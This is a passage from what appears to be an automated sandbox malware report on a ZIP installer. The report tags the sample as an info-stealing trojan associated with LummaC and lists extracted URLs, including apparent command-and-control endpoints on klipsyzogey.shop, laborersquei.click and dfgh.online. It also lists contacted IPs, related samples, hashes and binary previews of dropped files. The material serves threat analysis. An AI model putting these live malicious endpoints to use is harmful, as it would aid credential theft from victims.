                                                https://klipsyzogey.shop:443/int_clp_sha.txt4.dbPKLightweight.com, 00000017.00000002.2299988690.0000000000CD2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                unknown
                                                https://duckduckgo.com/ac/?q=Lightweight.com, 00000017.00000003.1903900954.0000000003CCC000.00000004.00000800.00020000.00000000.sdmp, Lightweight.com, 00000017.00000003.1904145611.0000000003C04000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://ocsp.sectigo.com07zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.drfalse
                                                    high
                                                    http://www.unicode.org/copyright.htmlopengl64.dll.10.drfalse
                                                      high
                                                      https://contoso.com/Licensepowershell.exe, 0000001E.00000002.2342405729.0000000006179000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://cegu.shop/Lightweight.com, 00000017.00000002.2304957335.0000000000FAD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://ocsps.ssl.com0installer_1.05_36.4.exe.10.drfalse
                                                          high
                                                          https://dfgh.online/invoker.php?compName=powershell.exe, 0000001C.00000002.2132862025.000000000336C000.00000004.00000020.00020000.00000000.sdmptrue
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.avast.com0/lang-1049.dll.10.dr, lang-1058.dll.10.drfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://aka.ms/pscore6powershell.exe, 0000001C.00000002.2134794357.00000000050C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2321451025.0000000005121000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Lightweight.com, 00000017.00000003.1903900954.0000000003CCC000.00000004.00000800.00020000.00000000.sdmp, Lightweight.com, 00000017.00000003.1904145611.0000000003C04000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0installer_1.05_36.4.exe.10.drfalse
                                                                high
                                                                http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0_installer_1.05_36.4.exe.10.drfalse
                                                                  high
                                                                  https://www.autoitscript.com/autoit3/Lightweight.com, 00000017.00000003.1850647478.0000000004131000.00000004.00000800.00020000.00000000.sdmp, Lightweight.com.13.dr, Mf.20.drfalse
                                                                    high
                                                                    https://klipsyzogey.shop/Lightweight.com, 00000017.00000002.2307418203.0000000003B40000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: malware
                                                                    unknown
                                                                    https://laborersquei.click/Lightweight.com, 00000017.00000002.2304957335.0000000000FAD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://curl.haxx.se/docs/http-cookies.html7zG.exe, 0000000A.00000003.1473463761.000001BFD0614000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.drfalse
                                                                      high
                                                                      http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0installer_1.05_36.4.exe.10.drfalse
                                                                        high
                                                                        http://crl.thawte.com/ThawteTimestampingCA.crl07zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.10.drfalse
                                                                          high
                                                                          http://x1.c.lencr.org/0Lightweight.com, 00000017.00000003.1952094808.0000000003CD9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://x1.i.lencr.org/0Lightweight.com, 00000017.00000003.1952094808.0000000003CD9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://www.microsoft.Ahpowershell.exe, 0000001E.00000002.2367808691.0000000008D10000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchLightweight.com, 00000017.00000003.1903900954.0000000003CCC000.00000004.00000800.00020000.00000000.sdmp, Lightweight.com, 00000017.00000003.1904145611.0000000003C04000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://contoso.com/powershell.exe, 0000001E.00000002.2342405729.0000000006179000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://nuget.org/nuget.exepowershell.exe, 0000001C.00000002.2156080772.000000000611A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2342405729.0000000006179000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://www.ssl.com/repository0installer_1.05_36.4.exe.10.drfalse
                                                                                      high
                                                                                      https://dfgh.onlinepowershell.exe, 0000001C.00000002.2134794357.0000000005214000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://dfgh.online/invoker.php?compname=powershell.exe, 0000001C.00000002.2165120458.0000000008212000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        unknown
                                                                                        https://support.mozilla.org/products/firefoxgro.allLightweight.com, 00000017.00000003.1953339162.0000000005885000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000001C.00000002.2134794357.00000000050C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2321451025.0000000005121000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://nuget.org/NuGet.exepowershell.exe, 0000001C.00000002.2156080772.000000000611A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2342405729.0000000006179000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://aka.ms/winsvr-2022-pshelppowershell.exe, 0000001E.00000002.2321451025.0000000005272000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://sectigo.com/CPS07zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.drfalse
                                                                                                  high
                                                                                                  https://go.microsoft.cpowershell.exe, 0000001E.00000002.2348706080.0000000007572000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoLightweight.com, 00000017.00000003.1903900954.0000000003CCC000.00000004.00000800.00020000.00000000.sdmp, Lightweight.com, 00000017.00000003.1904145611.0000000003C04000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000001E.00000002.2321451025.0000000005272000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000001E.00000002.2321451025.0000000005272000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000001E.00000002.2321451025.0000000005272000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://www.crossteccorp.com7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.10.drfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://bugs.freedesktop.org/enter_bug.cgi?product=Mesa7zG.exe, 0000000A.00000003.1473463761.000001BFD1680000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://go.micropowershell.exe, 0000001C.00000002.2134794357.00000000053D4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://ocsp.thawte.com07zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.10.drfalse
                                                                                                                high
                                                                                                                https://contoso.com/Iconpowershell.exe, 0000001E.00000002.2342405729.0000000006179000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://laborersquei.click:443/apiLightweight.com, 00000017.00000002.2299988690.0000000000CD2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  http://go.microsxpowershell.exe, 0000001E.00000002.2321451025.0000000005724000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Lightweight.com, 00000017.00000003.1903900954.0000000003CCC000.00000004.00000800.00020000.00000000.sdmp, Lightweight.com, 00000017.00000003.1904145611.0000000003C04000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://crl.rootca1.amazontrust.com/rootca1.crl0Lightweight.com, 00000017.00000003.1952094808.0000000003CD9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://www.autoitscript.com/autoit3/XLightweight.com, 00000017.00000000.1572086112.0000000000AE5000.00000002.00000001.01000000.00000009.sdmp, Lightweight.com, 00000017.00000003.1850647478.0000000004131000.00000004.00000800.00020000.00000000.sdmp, Organization.20.dr, Lightweight.com.13.drfalse
                                                                                                                        high
                                                                                                                        http://ocsp.rootca1.amazontrust.com0:Lightweight.com, 00000017.00000003.1952094808.0000000003CD9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://nsis.sf.net/NSIS_ErrorErrorinstaller_1.05_36.4.exe, 0000000C.00000000.1529422851.0000000000409000.00000002.00000001.01000000.00000008.sdmp, installer_1.05_36.4.exe.10.drfalse
                                                                                                                            high
                                                                                                                            http://www.google.comDUMPREQFLUSHD:/build/7zG.exe, 0000000A.00000003.1473463761.000001BFD047F000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.drfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            https://www.ecosia.org/newtab/Lightweight.com, 00000017.00000003.1903900954.0000000003CCC000.00000004.00000800.00020000.00000000.sdmp, Lightweight.com, 00000017.00000003.1904145611.0000000003C04000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brLightweight.com, 00000017.00000003.1953339162.0000000005885000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://github.com/Pester/Pesterpowershell.exe, 0000001E.00000002.2321451025.0000000005272000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://epicsupport.force.com/unrealengine/s/7zG.exe, 0000000A.00000003.1473463761.000001BFD047F000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.drfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  http://llvm.org/):7zG.exe, 0000000A.00000003.1473463761.000001BFD1599000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://ac.ecosia.org/autocomplete?q=Lightweight.com, 00000017.00000003.1903900954.0000000003CCC000.00000004.00000800.00020000.00000000.sdmp, Lightweight.com, 00000017.00000003.1904145611.0000000003C04000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.drfalse
                                                                                                                                        high
                                                                                                                                        https://laborersquei.click/apieLightweight.com, 00000017.00000002.2300915900.0000000000D3F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        unknown
                                                                                                                                        https://dfgh.online/invoker.php?compName=user-PCLgpowershell.exe, 0000001C.00000002.2134794357.0000000005214000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        unknown
                                                                                                                                        http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.drfalse
                                                                                                                                          high
                                                                                                                                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000001E.00000002.2321451025.0000000005272000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://crt.rootca1.amazontrust.com/rootca1.cer0?Lightweight.com, 00000017.00000003.1952094808.0000000003CD9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0installer_1.05_36.4.exe.10.drfalse
                                                                                                                                                high
                                                                                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Lightweight.com, 00000017.00000003.1903900954.0000000003CCC000.00000004.00000800.00020000.00000000.sdmp, Lightweight.com, 00000017.00000003.1904145611.0000000003C04000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                  • 75% < No. of IPs
                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                  172.67.166.49
                                                                                                                                                  laborersquei.clickUnited States
                                                                                                                                                  13335CLOUDFLARENETUStrue
                                                                                                                                                  185.161.251.21
                                                                                                                                                  cegu.shopUnited Kingdom
                                                                                                                                                  5089NTLGBfalse
                                                                                                                                                  172.67.214.186
                                                                                                                                                  klipsyzogey.shopUnited States
                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                  Analysis ID:1581027
                                                                                                                                                  Start date and time:2024-12-26 18:24:35 +01:00
                                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                                  Overall analysis duration:0h 8m 57s
                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                  Report type:full
                                                                                                                                                  Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                  Number of analysed new started processes analysed:32
                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                  Technologies:
                                                                                                                                                  • HCA enabled
                                                                                                                                                  • EGA enabled
                                                                                                                                                  • AMSI enabled
                                                                                                                                                  Analysis Mode:default
                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                  Sample name:installer_1.05_36.4.zip
                                                                                                                                                  Detection:MAL
                                                                                                                                                  Classification:mal100.troj.spyw.evad.winZIP@33/35@5/3
                                                                                                                                                  EGA Information:
                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                  HCA Information:
                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                  • Number of executed functions: 283
                                                                                                                                                  • Number of non-executed functions: 36
                                                                                                                                                  Cookbook Comments:
                                                                                                                                                  • Found application associated with file extension: .zip
                                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 23.218.208.109, 20.109.210.53
                                                                                                                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                  • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                  • VT rate limit hit for: installer_1.05_36.4.zip
                                                                                                                                                  TimeTypeDescription
                                                                                                                                                  12:25:40API Interceptor1x Sleep call for process: installer_1.05_36.4.exe modified
                                                                                                                                                  12:26:14API Interceptor12x Sleep call for process: Lightweight.com modified
                                                                                                                                                  12:26:39API Interceptor23x Sleep call for process: powershell.exe modified
                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                  172.67.166.49Scanjet 23002022.xlsxGet hashmaliciousAzorult gzRatBrowse
                                                                                                                                                  • etapackbg.com/css/Sngggz.png
                                                                                                                                                  172.67.214.186Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                      SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        https://os50-card.ru/50Get hashmaliciousUnknownBrowse
                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                          laborersquei.clickSET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 104.21.89.250
                                                                                                                                                          klipsyzogey.shopSet-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 172.67.214.186
                                                                                                                                                          setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 172.67.214.186
                                                                                                                                                          SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 172.67.214.186
                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                          CLOUDFLARENETUShttps://contractnerds.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                          • 104.17.25.14
                                                                                                                                                          Z4D3XAZ2jB.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                          • 104.21.93.162
                                                                                                                                                          http://vanessa.nilsson@dmava.nj.govGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 104.21.50.150
                                                                                                                                                          https://www.gglusa.us/Get hashmaliciousUnknownBrowse
                                                                                                                                                          • 104.18.11.207
                                                                                                                                                          0zBsv1tnt4.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 104.21.11.101
                                                                                                                                                          cqHMm0ykDG.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 104.21.11.101
                                                                                                                                                          setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 172.67.134.27
                                                                                                                                                          installer.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 104.21.6.3
                                                                                                                                                          setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 104.21.6.3
                                                                                                                                                          pVbAZEFIpI.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 172.67.157.254
                                                                                                                                                          CLOUDFLARENETUShttps://contractnerds.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                          • 104.17.25.14
                                                                                                                                                          Z4D3XAZ2jB.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                          • 104.21.93.162
                                                                                                                                                          http://vanessa.nilsson@dmava.nj.govGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 104.21.50.150
                                                                                                                                                          https://www.gglusa.us/Get hashmaliciousUnknownBrowse
                                                                                                                                                          • 104.18.11.207
                                                                                                                                                          0zBsv1tnt4.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 104.21.11.101
                                                                                                                                                          cqHMm0ykDG.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 104.21.11.101
                                                                                                                                                          setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 172.67.134.27
                                                                                                                                                          installer.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 104.21.6.3
                                                                                                                                                          setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 104.21.6.3
                                                                                                                                                          pVbAZEFIpI.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 172.67.157.254
                                                                                                                                                          NTLGBxd.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                          • 163.165.65.186
                                                                                                                                                          xd.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                          • 92.237.44.174
                                                                                                                                                          telnet.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 80.4.135.78
                                                                                                                                                          armv4l.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                          • 62.254.229.173
                                                                                                                                                          loligang.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                          • 82.3.236.97
                                                                                                                                                          loligang.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                          • 213.107.138.142
                                                                                                                                                          splarm7.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 82.43.102.253
                                                                                                                                                          jklspc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 86.21.69.116
                                                                                                                                                          nabarm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 82.47.212.199
                                                                                                                                                          splspc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 77.96.18.44
                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                          a0e9f5d64349fb13191bc781f81f42e10zBsv1tnt4.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 172.67.214.186
                                                                                                                                                          • 172.67.166.49
                                                                                                                                                          • 185.161.251.21
                                                                                                                                                          cqHMm0ykDG.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 172.67.214.186
                                                                                                                                                          • 172.67.166.49
                                                                                                                                                          • 185.161.251.21
                                                                                                                                                          pVbAZEFIpI.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 172.67.214.186
                                                                                                                                                          • 172.67.166.49
                                                                                                                                                          • 185.161.251.21
                                                                                                                                                          GxX48twWHA.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 172.67.214.186
                                                                                                                                                          • 172.67.166.49
                                                                                                                                                          • 185.161.251.21
                                                                                                                                                          RUUSfr6dVm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 172.67.214.186
                                                                                                                                                          • 172.67.166.49
                                                                                                                                                          • 185.161.251.21
                                                                                                                                                          9idglWFv95.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 172.67.214.186
                                                                                                                                                          • 172.67.166.49
                                                                                                                                                          • 185.161.251.21
                                                                                                                                                          tJd3ArrDAm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 172.67.214.186
                                                                                                                                                          • 172.67.166.49
                                                                                                                                                          • 185.161.251.21
                                                                                                                                                          gdtJGo7jH3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 172.67.214.186
                                                                                                                                                          • 172.67.166.49
                                                                                                                                                          • 185.161.251.21
                                                                                                                                                          oQSTpQfzz5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 172.67.214.186
                                                                                                                                                          • 172.67.166.49
                                                                                                                                                          • 185.161.251.21
                                                                                                                                                          rkPR0Fo9Cb.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 172.67.214.186
                                                                                                                                                          • 172.67.166.49
                                                                                                                                                          • 185.161.251.21
                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                          C:\Users\user\AppData\Local\Temp\709182\Lightweight.comSet-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                            Set-up.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                              PodcastsTries.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                vce exam simulator 2.2.1 crackk.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                  LVDdWBGnVE.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                    eMBO6wS1b5.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                      Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                        AxoPac.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                          Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                            Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):19184
                                                                                                                                                                              Entropy (8bit):5.574615758601737
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:384:8eBS5IwPKul6sDXJC7fdbnzDuqNCWUjaVjaxg9RT27f:3wPKG6uXULBTCLjaN/sj
                                                                                                                                                                              MD5:617D0DD5C80FC61E1B6D14C31A92B5C5
                                                                                                                                                                              SHA1:CB669B2D8843BFED049DB0AEECDA7E35DCDEE3E0
                                                                                                                                                                              SHA-256:DB57B8ED44EE4843F11AAD0F86ED7A6F6C3CF57225E9CD6A2C2A59C6AC9E9BC7
                                                                                                                                                                              SHA-512:A4ACCB1117B8DE493691BAA2F7B57C00BAE40DAD62507B7AD5DEE6EC383521B8D1CCF689F601FB197DD8B288F1400AAB3846A2DFB00A1B7CAD0523C55765F3FA
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:@...e.................................X..............@..........H...............o..b~.D.poM...9..... .Microsoft.PowerShell.ConsoleHostD...............4..7..D.#V.............System.Management.Automation4...............<."..Ke@...j..........System.Core.0.................Vn.F..kLsw..........System..4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.@................z.U..G...5.f.1........System.DirectoryServices<................t.,.lG....M...........System.Management...4..................~..2K..}...0".......System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...D....................+.H..!...e........System.Configuration.Ins
                                                                                                                                                                              Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:modified
                                                                                                                                                                              Size (bytes):947288
                                                                                                                                                                              Entropy (8bit):6.630612696399572
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                                                                                                                              MD5:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                              SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                                                                                                                              SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                                                                                                                              SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Joe Sandbox View:
                                                                                                                                                                              • Filename: Set-up.exe, Detection: malicious, Browse
                                                                                                                                                                              • Filename: Set-up.exe, Detection: malicious, Browse
                                                                                                                                                                              • Filename: PodcastsTries.exe, Detection: malicious, Browse
                                                                                                                                                                              • Filename: vce exam simulator 2.2.1 crackk.exe, Detection: malicious, Browse
                                                                                                                                                                              • Filename: LVDdWBGnVE.exe, Detection: malicious, Browse
                                                                                                                                                                              • Filename: eMBO6wS1b5.exe, Detection: malicious, Browse
                                                                                                                                                                              • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                              • Filename: AxoPac.exe, Detection: malicious, Browse
                                                                                                                                                                              • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                              • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):475334
                                                                                                                                                                              Entropy (8bit):7.999569623103536
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:12288:ykEViwwMnbe9alrkEbkVklZjFUqR0EBIU/M0cLWdyBut4Offn9:ytEwwIeUlrC6xFrb/MJKd0v41
